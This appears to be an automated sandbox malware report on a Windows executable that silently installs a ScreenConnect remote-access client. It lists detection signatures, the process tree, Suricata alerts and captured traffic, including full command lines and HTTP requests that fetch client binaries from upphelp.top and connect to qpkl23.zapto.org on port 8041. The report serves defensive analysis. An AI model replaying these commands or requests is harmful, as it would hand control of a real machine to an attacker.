Edit tour

Windows Analysis Report
mrKs8EKXbz.exe

Overview

General Information

Sample name:	mrKs8EKXbz.exe renamed because original name is a hash value
Original sample name:	9be96842563827373caedce47de8191e2be93f6d3286cf8b4286492be4445cad.exe
Analysis ID:	1522646
MD5:	10777132fc1e95538acbe0728e10939d
SHA1:	fac1fa861f72f12a30852bff9085b2be852a7d52
SHA256:	9be96842563827373caedce47de8191e2be93f6d3286cf8b4286492be4445cad
Tags:	exeupphelp-topuser-JAMESWT_MHT
Infos:

Detection

ScreenConnect Tool

Score:	63
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Compliance

Score:	20
Range:	0 - 100

Signatures

Detected unpacking (creates a PE file in dynamic memory)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

.NET source code references suspicious native API functions

Contains functionality to hide user accounts

Enables network access during safeboot for specific services

Reads the Security eventlog

Reads the System eventlog

AV process strings found (often used to terminate AV products)

Adds / modifies Windows certificates

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates or modifies windows services

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops certificate files (DER)

EXE planting / hijacking vulnerabilities found

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Launches processes in debugging mode, may be used to hinder debugging

May sleep (evasive loops) to hinder dynamic analysis

May use bcdedit to modify the Windows boot settings

Modifies existing windows services

One or more processes crash

PE file contains an invalid checksum

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports

Stores large binary data to the registry

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected ScreenConnect Tool

Classification

Process Tree

System is w10x64

mrKs8EKXbz.exe (PID: 3540 cmdline: "C:\Users\user\Desktop\mrKs8EKXbz.exe" MD5: 10777132FC1E95538ACBE0728E10939D)

dfsvc.exe (PID: 5576 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" MD5: B4088F44B80D363902E11F897A7BAC09)

ScreenConnect.WindowsClient.exe (PID: 5700 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe" MD5: 20AB8141D958A58AADE5E78671A719BF)

ScreenConnect.ClientService.exe (PID: 3488 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=qpkl23.zapto.org&p=8041&s=c75cf581-c081-4bd7-96da-5933e5da1d56&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1" MD5: 361BCC2CB78C75DD6F583AF81834E447)

WerFault.exe (PID: 432 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3540 -s 724 MD5: C31336C1EFC2CCB44B4326EA793040F2)

svchost.exe (PID: 6060 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

WerFault.exe (PID: 4000 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3540 -ip 3540 MD5: C31336C1EFC2CCB44B4326EA793040F2)

svchost.exe (PID: 2144 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

ScreenConnect.ClientService.exe (PID: 5728 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=qpkl23.zapto.org&p=8041&s=c75cf581-c081-4bd7-96da-5933e5da1d56&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1" MD5: 361BCC2CB78C75DD6F583AF81834E447)

ScreenConnect.WindowsClient.exe (PID: 6752 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe" "RunRole" "5907bb67-d556-434c-b64e-e4ceba678cb8" "User" MD5: 20AB8141D958A58AADE5E78671A719BF)

svchost.exe (PID: 6788 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000009.00000000.2382585113.0000000000C92000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
00000002.00000002.2999833132.0000015F80352000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
Process Memory Space: dfsvc.exe PID: 5576	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
Process Memory Space: ScreenConnect.WindowsClient.exe PID: 5700	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security
Process Memory Space: ScreenConnect.ClientService.exe PID: 3488	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
9.0.ScreenConnect.WindowsClient.exe.c90000.0.unpack	JoeSecurity_ScreenConnectTool	Yara detected ScreenConnect Tool	Joe Security

Sigma Signatures

Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports

Source: Network Connection

Author: Nasreddine Bencherchali (Nextron Systems): Data: DestinationIp: 192.168.2.6, DestinationIsIpv6: false, DestinationPort: 49715, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Initiated: true, ProcessId: 5576, Protocol: tcp, SourceIp: 79.110.49.196, SourceIsIpv6: false, SourcePort: 443

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 6060, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE Possible Windows executable sent when remote host claims to send html content

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T14:20:08.170802+0200	2009897	1	A Network Trojan was detected	79.110.49.196	443	192.168.2.6	49726	TCP
2024-09-30T14:20:09.324205+0200	2009897	1	A Network Trojan was detected	79.110.49.196	443	192.168.2.6	49727	TCP
2024-09-30T14:20:13.349058+0200	2009897	1	A Network Trojan was detected	79.110.49.196	443	192.168.2.6	49732	TCP
2024-09-30T14:20:14.462599+0200	2009897	1	A Network Trojan was detected	79.110.49.196	443	192.168.2.6	49733	TCP
2024-09-30T14:20:16.798438+0200	2009897	1	A Network Trojan was detected	79.110.49.196	443	192.168.2.6	49737	TCP
2024-09-30T14:20:18.031600+0200	2009897	1	A Network Trojan was detected	79.110.49.196	443	192.168.2.6	49738	TCP
2024-09-30T14:20:20.265333+0200	2009897	1	A Network Trojan was detected	79.110.49.196	443	192.168.2.6	49739	TCP
2024-09-30T14:20:21.738857+0200	2009897	1	A Network Trojan was detected	79.110.49.196	443	192.168.2.6	49740	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: mrKs8EKXbz.exe	Virustotal: Detection: 8%			Perma Link
Source: mrKs8EKXbz.exe	ReversingLabs: Detection: 18%

Cryptography

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\mrKs8EKXbz.exe

Code function: 1_2_00021000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,

1_2_00021000

Privilege Escalation

EXE planting / hijacking vulnerabilities found

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe	Jump to behavior

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe

Unpacked PE file: 9.2.ScreenConnect.WindowsClient.exe.1510000.1.unpack

EXE planting / hijacking vulnerabilities found

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	EXE: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe	Jump to behavior

Uses 32bit PE files

Source: mrKs8EKXbz.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

PE / OLE file has a valid certificate

Source: mrKs8EKXbz.exe

Static PE information: certificate valid

Uses secure TLS version for HTTPS connections

Source: unknown

HTTPS traffic detected: 79.110.49.196:443 -> 192.168.2.6:49715 version: TLS 1.2

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: mrKs8EKXbz.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Binary contains paths to debug symbols

Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000002.00000002.2999833132.0000015F805AC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F8023B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F8066F000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2399153993.0000000001512000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: mrKs8EKXbz.exe
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000002.00000002.2999833132.0000015F806AB000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F805A8000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F80236000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.2397686210.0000000002E32000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000C.00000002.3393468743.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000C.00000002.3392568881.0000000001060000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.2.dr, ScreenConnect.ClientService.dll0.2.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2382585113.0000000000C92000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000000.2393123343.0000000000B1D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000002.00000002.2999833132.0000015F80232000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F806BC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F805A4000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2401330728.000000001BF92000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.2.dr, ScreenConnect.Windows.dll.2.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2382585113.0000000000C92000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: dfsvc.exe, 00000002.00000002.2999833132.0000015F80232000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F806BC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F805A4000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2401330728.000000001BF92000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.2.dr, ScreenConnect.Windows.dll.2.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000002.00000002.2999833132.0000015F805AC000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F8023B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2999833132.0000015F8066F000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2399153993.0000000001512000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000002.00000002.2999833132.0000015F8022A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.2398171726.0000000005362000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Core.dll0.2.dr, ScreenConnect.Core.dll.2.dr

Spreading

Source: C:\Users\user\Desktop\mrKs8EKXbz.exe

Code function: 1_2_00024A4B FindFirstFileExA,

1_2_00024A4B

Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\Apps\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\Apps\2.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.196:443 -> 192.168.2.6:49726
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.196:443 -> 192.168.2.6:49737
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.196:443 -> 192.168.2.6:49727
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.196:443 -> 192.168.2.6:49733
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.196:443 -> 192.168.2.6:49739
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.196:443 -> 192.168.2.6:49740
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.196:443 -> 192.168.2.6:49732
Source: Network traffic	Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.196:443 -> 192.168.2.6:49738

Enables network access during safeboot for specific services

Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe

Registry value created: NULL Service

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.6:49743 -> 79.110.49.196:8041

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=qpkl23.zapto.org&p=8041&s=c75cf581-c081-4bd7-96da-5933e5da1d56&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session HTTP/1.1Host: upphelp.topAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: upphelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: upphelp.topAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: upphelp.topAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: upphelp.topAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: upphelp.topAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: upphelp.topAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: upphelp.topAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: upphelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: upphelp.topAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: upphelp.topAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: upphelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: upphelp.topAccept-Encoding: gzip

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: OTAVANET-ASCZ OTAVANET-ASCZ

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=qpkl23.zapto.org&p=8041&s=c75cf581-c081-4bd7-96da-5933e5da1d56&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session HTTP/1.1Host: upphelp.topAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: upphelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: upphelp.topAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: upphelp.topAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: upphelp.topAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: upphelp.topAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: upphelp.topAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: upphelp.topAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: upphelp.topAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: upphelp.topAccept-Encoding: gzipConnection: Keep-Alive
